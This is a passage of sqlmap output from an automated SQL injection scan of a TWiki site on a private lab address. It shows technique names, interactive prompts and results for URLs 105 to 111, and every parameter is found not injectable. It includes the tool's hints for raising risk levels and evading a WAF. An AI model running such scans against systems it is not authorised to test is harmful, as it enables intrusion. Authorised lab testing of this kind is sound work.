[19:25:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:25:38] [WARNING] reflective value(s) found and filtering out | |
[19:25:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:25:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:25:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:25:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:25:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:25:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:25:44] [INFO] testing 'MySQL inline queries' | |
[19:25:44] [INFO] testing 'PostgreSQL inline queries' | |
[19:25:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:25:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:25:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:25:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:25:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:25:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:25:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:25:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:25:49] [INFO] testing 'Oracle AND time-based blind' | |
[19:25:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:25:50] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:26:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:26:11] [WARNING] GET parameter 'skin' is not injectable | |
[19:26:11] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.62&rev2=1.61' | |
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.61' | |
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.61&rev2=1.60' | |
[19:26:11] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.60' | |
URL 105: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsmore¶m1=1.62¶m2=1.62 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:26:11] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsmore¶m1=1.62¶m2=1.62' | |
[19:26:11] [INFO] testing connection to the target URL | |
[19:26:12] [INFO] testing if the target URL is stable | |
[19:26:13] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:26:13] [INFO] skipping previously processed GET parameter 'template' | |
[19:26:13] [INFO] skipping previously processed GET parameter 'param1' | |
[19:26:13] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:26:13] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:26:13] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:26:13] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:26:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:26:13] [WARNING] reflective value(s) found and filtering out | |
[19:26:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:26:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:26:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:26:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:26:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:26:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:26:17] [INFO] testing 'MySQL inline queries' | |
[19:26:18] [INFO] testing 'PostgreSQL inline queries' | |
[19:26:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:26:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:26:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:26:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:26:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:26:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:26:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:26:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:26:21] [INFO] testing 'Oracle AND time-based blind' | |
[19:26:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:26:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:26:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:26:38] [WARNING] GET parameter 'param2' is not injectable | |
[19:26:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 106: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WelcomeGuest?t=1441457191 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:26:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WelcomeGuest?t=1441457191' | |
[19:26:38] [INFO] testing connection to the target URL | |
[19:26:38] [INFO] testing if the target URL is stable | |
[19:26:39] [INFO] target URL is stable | |
[19:26:39] [INFO] testing if GET parameter 't' is dynamic | |
[19:26:39] [WARNING] GET parameter 't' does not appear dynamic | |
[19:26:39] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:26:39] [INFO] testing for SQL injection on GET parameter 't' | |
[19:26:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:26:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:26:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:26:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:26:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:26:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:26:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:26:43] [INFO] testing 'MySQL inline queries' | |
[19:26:43] [INFO] testing 'PostgreSQL inline queries' | |
[19:26:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:26:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:26:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:26:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:26:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:26:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:26:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:26:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:26:46] [INFO] testing 'Oracle AND time-based blind' | |
[19:26:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:26:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:26:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:26:58] [WARNING] GET parameter 't' is not injectable | |
[19:26:58] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 107: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Welcome *Guest[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:26:58] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Welcome *Guest[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:26:58] [INFO] testing connection to the target URL | |
[19:26:58] [INFO] testing if the target URL is stable | |
[19:26:59] [INFO] target URL is stable | |
[19:26:59] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:26:59] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:26:59] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:26:59] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:26:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:26:59] [WARNING] reflective value(s) found and filtering out | |
[19:27:00] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable | |
[19:27:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:27:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:27:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:27:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:27:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:27:01] [INFO] testing 'MySQL inline queries' | |
[19:27:01] [INFO] testing 'PostgreSQL inline queries' | |
[19:27:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:27:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:27:02] [WARNING] time-based comparison requires larger statistical model, please wait...... | |
[19:27:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:27:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:27:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:27:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:27:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:27:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:27:03] [INFO] testing 'Oracle AND time-based blind' | |
[19:27:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' | |
[19:27:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:27:03] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found | |
[19:27:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' | |
[19:27:07] [INFO] checking if the injection point on URI parameter '#1*' is a false positive | |
[19:27:07] [WARNING] false positive or unexploitable injection point detected | |
[19:27:07] [WARNING] URI parameter '#1*' is not injectable | |
[19:27:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 108: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:27:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?skin=print' | |
[19:27:07] [INFO] testing connection to the target URL | |
[19:27:07] [INFO] testing if the target URL is stable | |
[19:27:08] [INFO] target URL is stable | |
[19:27:08] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:27:08] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:27:08] [INFO] GET parameter 'skin' is dynamic | |
[19:27:08] [INFO] heuristics detected web page charset 'ascii' | |
[19:27:08] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:27:08] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:27:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:27:09] [WARNING] reflective value(s) found and filtering out | |
[19:27:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:27:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:27:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:27:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:27:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:27:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:27:13] [INFO] testing 'MySQL inline queries' | |
[19:27:13] [INFO] testing 'PostgreSQL inline queries' | |
[19:27:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:27:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:27:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:27:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:27:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:27:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:27:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:27:18] [INFO] testing 'Oracle AND time-based blind' | |
[19:27:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:27:19] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:27:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:27:34] [WARNING] GET parameter 'skin' is not injectable | |
[19:27:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 109: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WelcomeGuest?rev1=1.21&rev2=1.20 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:27:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WelcomeGuest?rev1=1.21&rev2=1.20' | |
[19:27:34] [INFO] testing connection to the target URL | |
[19:27:34] [INFO] testing if the target URL is stable | |
[19:27:35] [INFO] target URL is stable | |
[19:27:35] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:27:35] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:27:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:27:36] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[19:27:36] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:27:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:27:36] [WARNING] reflective value(s) found and filtering out | |
[19:27:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:27:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:27:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:27:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:27:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:27:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:27:39] [INFO] testing 'MySQL inline queries' | |
[19:27:39] [INFO] testing 'PostgreSQL inline queries' | |
[19:27:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:27:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:27:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:27:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:27:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:27:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:27:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:27:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:27:43] [INFO] testing 'Oracle AND time-based blind' | |
[19:27:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:27:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:27:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:27:56] [WARNING] GET parameter 'rev1' is not injectable | |
[19:27:56] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:27:56] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[19:27:56] [INFO] GET parameter 'rev2' is dynamic | |
[19:27:56] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:27:56] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[19:27:56] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:27:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:27:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:27:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:27:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:28:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:28:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:28:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:28:01] [INFO] testing 'MySQL inline queries' | |
[19:28:02] [INFO] testing 'PostgreSQL inline queries' | |
[19:28:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:28:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:28:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:28:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:28:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:28:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:28:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:28:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:28:07] [INFO] testing 'Oracle AND time-based blind' | |
[19:28:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:28:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:28:20] [WARNING] GET parameter 'rev2' is not injectable | |
[19:28:20] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 110: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?rev=1.20 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:28:20] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?rev=1.20' | |
[19:28:20] [INFO] testing connection to the target URL | |
[19:28:20] [INFO] testing if the target URL is stable | |
[19:28:21] [INFO] target URL is stable | |
[19:28:21] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:28:21] [WARNING] GET parameter 'rev' does not appear dynamic | |
[19:28:21] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:28:21] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:28:21] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:28:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:28:22] [WARNING] reflective value(s) found and filtering out | |
[19:28:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:28:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:28:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:28:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:28:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:28:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:28:26] [INFO] testing 'MySQL inline queries' | |
[19:28:26] [INFO] testing 'PostgreSQL inline queries' | |
[19:28:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:28:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:28:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:28:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:28:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:28:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:28:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:28:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:28:29] [INFO] testing 'Oracle AND time-based blind' | |
[19:28:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:28:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:28:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:28:44] [WARNING] GET parameter 'rev' is not injectable | |
[19:28:44] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:28:44] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WelcomeGuest?rev1=1.20&rev2=1.19' | |
[19:28:44] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WelcomeGuest?rev=1.19' | |
URL 111: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WelcomeGuest?template=oopsmore¶m1=1.21¶m2=1.21 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:28:44] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WelcomeGuest?template=oopsmore¶m1=1.21¶m2=1.21' | |
[19:28:44] [INFO] testing connection to the target URL | |
[19:28:44] [INFO] testing if the target URL is stable | |
[19:28:45] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:28:45] [INFO] testing if GET parameter 'template' is dynamic | |
[19:28:45] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:28:45] [INFO] GET parameter 'template' is dynamic | |
[19:28:45] [INFO] heuristics detected web page charset 'ascii' | |
[19:28:45] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:28:45] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:28:45] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:28:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:28:45] [WARNING] reflective value(s) found and filtering out | |
[19:28:46] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:28:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:28:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:28:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:28:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:28:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:28:48] [INFO] testing 'MySQL inline queries' | |
[19:28:48] [INFO] testing 'PostgreSQL inline queries' | |
[19:28:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:28:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:28:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:28:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:28:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:28:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:28:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:28:51] [INFO] testing 'Oracle AND time-based blind' | |
[19:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:28:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:28:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:29:01] [WARNING] GET parameter 'template' is not injectable | |
[19:29:01] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:29:01] [WARNING] GET parameter 'param1' does not appear dynamic | |
[19:29:01] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:29:01] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:29:01] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:29:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:29:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:29:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:29:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:29:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:29:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:29:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:29:05] [INFO] testing 'MySQL inline queries' | |
[19:29:05] [INFO] testing 'PostgreSQL inline queries' | |
[19:29:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:29:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:29:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:29:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:29:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:29:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:29:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:29:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:29:09] [INFO] testing 'Oracle AND time-based blind' | |
[19:29:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:29:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:29:25] [WARNING] GET parameter 'param1' is not injectable | |
[19:29:25] [INFO] testing if GET parameter 'param2' is dynamic | |
